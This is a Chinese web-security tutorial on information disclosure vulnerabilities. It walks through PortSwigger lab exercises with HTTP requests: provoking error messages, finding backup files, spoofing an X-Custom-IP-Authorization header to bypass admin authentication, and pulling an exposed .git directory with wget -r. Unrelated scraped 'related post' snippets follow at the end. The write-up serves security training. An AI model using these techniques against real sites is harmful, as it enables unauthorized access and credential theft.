欢迎关注订阅专栏!
WEB安全系列包括如下三个专栏:

  • 《WEB安全基础-服务器端漏洞》
  • 《WEB安全基础-客户端漏洞》
  • 《WEB安全高级-综合利用》

知识点全面细致,逻辑清晰、结合实战,并配有大量练习靶场,让你读一篇、练一篇,掌握一篇,在学习路上事半功倍,少走弯路!
欢迎关注订阅专栏!

  • 专栏文章追求对知识点的全面总结,逻辑严密,方便学习掌握。力求做到看完一篇文章,掌握一类漏洞知识。让读者简洁高效的掌握WEB安全知识框架,推开入门深造的大门。
  • 绝不为了追求文章数量,彰显内容丰富而故意拆散相关知识点。避免读者沉迷在无尽的技巧中而迷失进阶的道路!本系列的目标是授之以渔,而不仅仅是技巧的堆砌。
  • 每篇文章均配有大量靶场,点击文章中靶场名即可跳转练习(靶场在网站注册即可免费使用)。
  • 欢迎订阅专栏!建议学完两个基础专栏,再学习高级哦~

WEB安全基础入门—信息泄露漏洞

  • 1. 什么是信息泄露漏洞
  • 2. 通常泄露信息的途径
  • 3. 信息泄露引起的原因
  • 3. 漏洞利用
    • 1. 探测漏洞存在
    • 2. 报错信息中的信息泄露
    • 3. 隐藏路径中包含敏感信息
    • 4. 通过备份文件查看源代码
    • 5. 错误配置导致信息泄露
    • 6. 版本控制历史信息泄露
  • 4. 漏洞实例
    • 1. 错误消息中的信息泄漏([Information disclosure in error messages](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-error-messages))
    • 2. 调试页面上的信息泄露([Information disclosure on debug page](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-on-debug-page))
    • 3. 通过备份文件泄露源代码([Source code disclosure via backup files](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-via-backup-files))
    • 4. 通过信息泄露绕过身份验证([Authentication bypass via information disclosure](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-authentication-bypass))
    • 5. 版本控制历史中的信息泄漏 ([Information disclosure in version control history](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-version-control-history))

1. 什么是信息泄露漏洞

网站或应用在响应中无意间泄露的敏感信息,攻击者获取到这些敏感信息为后续攻击做准备。泄露的信息主要包括以下三类:

  • 其他账户的数据或财务信息意外泄露
  • 敏感业务数据泄露
  • 网站及其基础架构技术细节信息泄露

2. 通常泄露信息的途径

  • 扫描获得的网站目录和文件信息。 /cgi-bin/phpinfo 等等
  • /robots.txt/sitemap.xml君子协定文件里的路径文件信息
  • 遗漏的临时备份的源代码文件/.git /backup
  • 数据库报错或异常响应信息中反馈的内容
  • 应用反馈过多的非必要展示信息
  • 硬编码写在源码中的API KEY 、IP地址、数据库信息等

3. 信息泄露引起的原因

  • 开发遗留的部分信息,未在上线前进行清理。
  • 不安全的配置导致。比如debug模式上线后未关闭,导致在公开使用时,泄露大量调试报错信息。
  • 程序设计和实现缺陷。

3. 漏洞利用

1. 探测漏洞存在

渗透测试的一项关键技能是能够随时随地识别有价值的信息。下面的几个具体方法可以用来探测漏洞是否存在:

  • 输入混淆的参数

一旦对某个参数感兴趣,可以将该参数值进行混淆输入,观察应用响应。这一步可使用Burp爆破模块进行大量自动化的混淆测试。

  • 使用扫描器对网站进行扫描
  • 使用Burp或其他相关工具探寻信息
    • search-能在监测的所有数据包中快速筛选指定内容。
    • find comments-在检测的所有数据包和文件中,快速查找注释
    • discover content-内容探测,发现隐藏的路径、敏感信息和文件
  • 使用各种方式,诱使应用响应报错信息

2. 报错信息中的信息泄露

例题1

3. 隐藏路径中包含敏感信息

例题2

4. 通过备份文件查看源代码

例题 3

5. 错误配置导致信息泄露

例题4

6. 版本控制历史信息泄露

在开发阶段经常使用版本控制系统,例如Git 在路径扫描中有时能发现路径/.git 可在攻击端安装Git,直接拉取下载,来获取部分源代码

例题5

4. 漏洞实例

1. 错误消息中的信息泄漏(Information disclosure in error messages)

获取使用框架的版本号

抓取数据包/product?productId=20随意在后面加个特殊符号如'尝试引起报错。

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 1511Internal Server Error: java.lang.NumberFormatException: For input string: "20'"at java.base/java.lang.NumberFormatException.forInputString(NumberFormatException.java:67)at java.base/java.lang.Integer.parseInt(Integer.java:668)at java.base/java.lang.Integer.parseInt(Integer.java:786).......at java.base/java.lang.Thread.run(Thread.java:833)Apache Struts 2 2.3.31

获取到框架及其版本号

2. 调试页面上的信息泄露(Information disclosure on debug page)

获取SECRET_KEY

通过路径扫描,发现/cgi-bin/phpinfo

3. 通过备份文件泄露源代码(Source code disclosure via backup files)

获取部分源代码,找到数据库密码

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Connection: close
Content-Length: 32User-agent: *
Disallow: /backup
  1. 访问/backup存在源代码备份,从中找到数据库密码

4. 通过信息泄露绕过身份验证(Authentication bypass via information disclosure)

指定header为本地的用户才有权限访问admin, 删除账户carlos
测试账户:wiener:peter

Admin interface only available to local users

  1. 使用TRACE 方法 访问该页面发现X-Custom-IP-Authorization: IP
TRACE /admin/ HTTP/1.1
Host: acd91ff31f481bb2c0acb121008d007b.web-security-academy.net
Origin: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Connection: close
Cookie: session=CdwDkeDYoxOtc7RD83dIx71oQaL2kwRx
HTTP/1.1 200 OK
Content-Type: message/http
Connection: close
Content-Length: 416TRACE /admin/ HTTP/1.1
Host: acd91ff31f481bb2c0acb121008d007b.web-security-academy.net
Origin: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Connection: close
Cookie: session=CdwDkeDYoxOtc7RD83dIx71oQaL2kwRx
X-Custom-IP-Authorization: IP
  1. 在访问GET /admin 设置X-Custom-IP-Authorization: 127.0.0.1成功绕过限制
GET /admin/ HTTP/1.1
Host: acd91ff31f481bb2c0acb121008d007b.web-security-academy.net
X-Custom-IP-Authorization: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Connection: close
Cookie: session=CdwDkeDYoxOtc7RD83dIx71oQaL2kwRx

5. 版本控制历史中的信息泄漏 (Information disclosure in version control history)

获取administrator密码, 删除账户carlos

扫描发信版本控制路径/.git
使用linux命令拉取下载
wget -r https://your-lab-id.web-security-academy.net/.git/

0000000000000000000000000000000000000000 4e09c0b6424c3d3ef8c3a5bc704d8267f2734808 Carlos Montoya <carlos@evil-user.net> 1654060361 +0000 commit (initial): Add skeleton admin panel
4e09c0b6424c3d3ef8c3a5bc704d8267f2734808 bc92290a11f85897017c0ff4d0e0a89505f8fbcf Carlos Montoya <carlos@evil-user.net> 1654060361 +0000    commit: Remove admin password from config
使用diff命令查看变化,可获取到administrator密码

公司账号密码、通信录泄露屡见不鲜,肆意流淌的敏感信息:WEB安全基础入门—信息泄露漏洞相关推荐

  1. 【Quartz】解密properties配置文件中的账号密码

    在配置quartz时,为了保密某些信息(特别是账号密码),通常会使用密文.那么在实际使用这些配置信息时,需要进行解密.本文提供一种解密方法如下: (1)假设在properties文件中加密了账号密码 ...

  2. spotify电脑下载歌曲_流媒体音乐平台Spotify部分账号密码泄露 并非数据库泄露而是撞库...

    流媒体音乐平台 Spotify 日前发布安全警告称 , 监测到多达35万名该平台用户账号出现异地登录和异常操作问题.该公司向受影响的用户发出安全邮件提醒用户尽快修改密码,否则自己的账号可能会在世界各地 ...

  3. Kyan网络监控设备账号密码泄露漏洞

    1.漏洞描述 Kyan网络监控设备存在账号密码泄露漏洞,该漏洞是由于开发人员将记录账户密码的文件放到网站目录,攻击者可通过访问目录获取Kyan网络监控设备账号密码,进入控制后台. 2.网络资产查找 F ...

  4. 如何预防账号密码泄露等安全问题

    我个人对黑客和网络安全比较感兴趣,时常关注这方面的新闻.我们知道这些安全问题都是软件程序有Bug导致的,例如CSDN的数据库泄露事件.携程泄露用户银行卡信息事件.电商网站被用户篡改购买支付金额等等. ...

  5. Kyan 网络监控设备 hosts 账号密码泄露漏洞

    漏洞描述 Kyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限 漏洞影响 s ✅Kyan 空间测绘 d ⭕title="platform - Login&q ...

  6. 中科网威 下一代防火墙控制系统 账号密码泄露漏洞

    漏洞描述 i ⭐中科网威 下一代防火墙控制系统 存在账号密码泄露漏洞,攻击者通过前端获取密码的Md5后解密可获取完整密码登陆后台 漏洞影响 s ✅中科网威 下一代防火墙控制系统 空间测绘 d ⭕FOF ...

  7. 海康流媒体管理服务器账号密码泄露漏洞

    海康流媒体管理服务器账号密码泄露漏洞 1.海康流媒体管理服务器账号密码泄露漏洞 1.1.漏洞描述 1.2.漏洞影响 1.3.FOFA 2.漏洞复现 2.1.登录页面 2.2.POC 2.3.登录验证 ...

  8. 也许你的账号密码就是这样泄露了!

    点击上方"程序人生",选择"置顶公众号" 第一时间关注程序猿(媛)身边的故事 图片源自unsplash 作者 fightjiang 如需转载,请联系原作者授权. ...

  9. D-Link DCS系列监控账号密码信息泄露

    简介: 漏洞编号:CVE-2020-25078 D-Link DCS是网络监控摄像机设备,通过访问特定的URL可以得到账号密码信息,攻击方可以 直接进入利用漏洞得到账户密码直接进入后台获取视频监控页面 ...

  10. D-Link DCS系列监控 账号密码信息泄露漏洞

    漏洞简介 D-Link DCS-2200是一款监控摄像机,成像色彩为彩色 是一款网络摄像机, 根据VULDB 所看到的信息原文如下 A vulnerability, which was classif ...

最新文章

  1. 杨学海:跨境电商新通道-进口保税直邮模式解析
  2. spring中间scope详细解释
  3. myloader原理解析
  4. ICML 2020 | 基于连续动态系统学习更加灵活的位置编码
  5. 80端口被system(pid=4)占用的解决方法
  6. 文件夹复制 覆盖_软网应用:U盘即插即复制
  7. Linux Vi的使用
  8. nginx 常用命令整理
  9. 【AudioVideo】处理音频输出的变化(13)
  10. 三星S10+真机上手视频流出:屏下指纹让强迫症不忍直视
  11. pagehelper的使用_Spring Boot 2.x(十三):你不知道的PageHelper
  12. 【OpenCV】矩阵掩模操作
  13. 记录es几个问题,增删改查,索引创建
  14. php 验证码不正确,php验证码提示错误
  15. Win10上装SAS
  16. 广告系统,业务与架构细节
  17. java调用默认打印机打印发货标签
  18. 鸿蒙系统剽窃,外媒再爆猛料!质疑华为鸿蒙系统抄袭:被指山寨谷歌安卓11系统...
  19. 如何将一个向量投影到一个平面上_向量的各种积
  20. 2022春招实习面经【美团、阿里、微软、字节、米哈游】

热门文章

  1. 黑马程序员—黑马程序员CEO方立勋致全体员工和同学们的公开信
  2. 数据结构课程设计——宿舍管理查询软件
  3. 微型计算机控制程序题,微机控制技术》习题集
  4. 2.vue的不更新特性-重用机制和key属性-data及其他字段-vue生命周期
  5. foobar2000 Mac版终于来了
  6. 计算机二级公共基础知识个人整理
  7. win10 64位下Oracle10g安装
  8. mysql-connector-java-8.0.26-bin.jar 包含bin的jar下载
  9. 苹果无线笔记本怎么连不上win服务器,苹果笔记本连不上无线_苹果笔记本连不上wifi...
  10. vsCode PlatformIO + jlink + GD32VF103